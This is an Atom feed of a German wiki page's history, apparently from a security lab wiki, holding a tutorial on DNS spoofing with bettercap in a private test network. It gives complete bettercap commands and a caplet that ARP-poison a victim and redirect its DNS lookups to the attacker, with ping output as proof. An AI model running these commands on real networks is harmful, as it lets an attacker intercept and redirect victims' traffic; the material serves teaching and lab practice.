<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="de">
	<id>https://xinux.net/index.php?action=history&amp;feed=atom&amp;title=Dnsspoofing_mit_Bettercap</id>
	<title>Dnsspoofing mit Bettercap - Versionsgeschichte</title>
	<link rel="self" type="application/atom+xml" href="https://xinux.net/index.php?action=history&amp;feed=atom&amp;title=Dnsspoofing_mit_Bettercap"/>
	<link rel="alternate" type="text/html" href="https://xinux.net/index.php?title=Dnsspoofing_mit_Bettercap&amp;action=history"/>
	<updated>2026-08-23T16:05:42Z</updated>
	<subtitle>Versionsgeschichte dieser Seite in Xinux Wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://xinux.net/index.php?title=Dnsspoofing_mit_Bettercap&amp;diff=72949&amp;oldid=prev</id>
		<title>Thomas.will: Die Seite wurde neu angelegt: „=Bettercap: DNS-Spoofing=  =Szenario= *OPFER=10.0.10.104 *ANGREIFER=10.0.10.101 *INTERFACE=eth0  Der Angreifer sitzt bereits per ARP-Spoofing zwischen OPFER un…“</title>
		<link rel="alternate" type="text/html" href="https://xinux.net/index.php?title=Dnsspoofing_mit_Bettercap&amp;diff=72949&amp;oldid=prev"/>
		<updated>2026-08-20T14:31:02Z</updated>

		<summary type="html">&lt;p&gt;Die Seite wurde neu angelegt: „=Bettercap: DNS-Spoofing=  =Szenario= *OPFER=10.0.10.104 *ANGREIFER=10.0.10.101 *INTERFACE=eth0  Der Angreifer sitzt bereits per ARP-Spoofing zwischen OPFER un…“&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Neue Seite&lt;/b&gt;&lt;/p&gt;&lt;div&gt;=Bettercap: DNS-Spoofing=&lt;br /&gt;
&lt;br /&gt;
=Szenario=&lt;br /&gt;
*OPFER=10.0.10.104&lt;br /&gt;
*ANGREIFER=10.0.10.101&lt;br /&gt;
*INTERFACE=eth0&lt;br /&gt;
&lt;br /&gt;
Der Angreifer sitzt bereits per ARP-Spoofing zwischen OPFER und Gateway und&lt;br /&gt;
faelscht zusaetzlich die DNS-Antworten. Fragt das OPFER nach xinux.de, bekommt&lt;br /&gt;
es die IP des Angreifers zurueck statt der echten - und landet auf dessen Server.&lt;br /&gt;
&lt;br /&gt;
=Benoetigtes Paket=&lt;br /&gt;
*apt-get install bettercap&lt;br /&gt;
&lt;br /&gt;
=Echte Adresse zum Vergleich=&lt;br /&gt;
*host -4 xinux.de&lt;br /&gt;
 xinux.de has address 94.130.248.215&lt;br /&gt;
&lt;br /&gt;
=Angreifer: Spoofing-Ziel festlegen=&lt;br /&gt;
;bettercap steuert das Umschreiben ueber zwei Werte: welche Namen gefaelscht&lt;br /&gt;
;werden (dns.spoof.domains) und auf welche IP umgebogen wird (dns.spoof.address).&lt;br /&gt;
*bettercap -iface eth0&lt;br /&gt;
&lt;br /&gt;
;Im bettercap-Prompt:&lt;br /&gt;
*set arp.spoof.targets 10.0.10.104&lt;br /&gt;
*set arp.spoof.fullduplex true&lt;br /&gt;
*set dns.spoof.domains xinux.de&lt;br /&gt;
*set dns.spoof.address 10.0.10.101&lt;br /&gt;
*net.probe on&lt;br /&gt;
*arp.spoof on&lt;br /&gt;
*dns.spoof on&lt;br /&gt;
&lt;br /&gt;
=Optionen=&lt;br /&gt;
 arp.spoof.targets     =  das Opfer&lt;br /&gt;
 arp.spoof.fullduplex  =  beide Richtungen vergiften (Opfer und Gateway)&lt;br /&gt;
 dns.spoof.domains     =  welche Namen gefaelscht werden (hier xinux.de)&lt;br /&gt;
 dns.spoof.address     =  auf welche IP umgebogen wird (die des Angreifers)&lt;br /&gt;
 net.probe on          =  ARP-Cache vorab fuellen&lt;br /&gt;
 arp.spoof on          =  ARP-Spoofing starten (Voraussetzung fuers DNS-Spoofing)&lt;br /&gt;
 dns.spoof on          =  DNS-Antworten faelschen&lt;br /&gt;
&lt;br /&gt;
;Wichtig: dns.spoof funktioniert nur, wenn arp.spoof laeuft. Erst muss der DNS-&lt;br /&gt;
;Verkehr des Opfers ueber den Angreifer laufen, dann kann er die Antworten&lt;br /&gt;
;umschreiben. Nur dns.spoof ohne arp.spoof sieht die Anfragen gar nicht.&lt;br /&gt;
&lt;br /&gt;
=Als Caplet (reproduzierbar)=&lt;br /&gt;
;Das Caplet ist nichts weiter als die obigen Befehle in eine Datei geschrieben,&lt;br /&gt;
;damit man sie nicht jedes Mal von Hand tippt.&lt;br /&gt;
*vim seclab-dns.cap:&lt;br /&gt;
 net.probe on&lt;br /&gt;
 set arp.spoof.targets 10.0.10.104&lt;br /&gt;
 set arp.spoof.fullduplex true&lt;br /&gt;
 set dns.spoof.domains xinux.de&lt;br /&gt;
 set dns.spoof.address 10.0.10.101&lt;br /&gt;
 arp.spoof on&lt;br /&gt;
 dns.spoof on&lt;br /&gt;
&lt;br /&gt;
;Start:&lt;br /&gt;
*bettercap -iface eth0 -caplet seclab-dns.cap&lt;br /&gt;
&lt;br /&gt;
=OPFER: Beweis=&lt;br /&gt;
*ping xinux.de&lt;br /&gt;
 PING xinux.de (10.0.10.101) 56(84) bytes of data.&lt;br /&gt;
 64 bytes from kali.secure.local (10.0.10.101): icmp_seq=1 ttl=64 time=0.444 ms&lt;br /&gt;
 64 bytes from kali.secure.local (10.0.10.101): icmp_seq=2 ttl=64 time=0.395 ms&lt;br /&gt;
 64 bytes from kali.secure.local (10.0.10.101): icmp_seq=3 ttl=64 time=0.263 ms&lt;br /&gt;
&lt;br /&gt;
;Statt der echten 94.130.248.215 loest xinux.de jetzt auf 10.0.10.101 auf - die&lt;br /&gt;
;Adresse des Angreifers. Das Opfer landet bei jedem Aufruf von xinux.de auf dem&lt;br /&gt;
;Server des Angreifers.&lt;br /&gt;
&lt;br /&gt;
=Angriff beenden=&lt;br /&gt;
;Im bettercap-Prompt:&lt;br /&gt;
*dns.spoof off&lt;br /&gt;
*arp.spoof off&lt;br /&gt;
*q&lt;br /&gt;
&lt;br /&gt;
;arp.spoof off schickt re-ARP, damit die ARP-Caches wieder stimmen.&lt;br /&gt;
&lt;br /&gt;
=Weiterfuehrende Angriffe=&lt;br /&gt;
*[[Ngrep]]&lt;/div&gt;</summary>
		<author><name>Thomas.will</name></author>
	</entry>
</feed>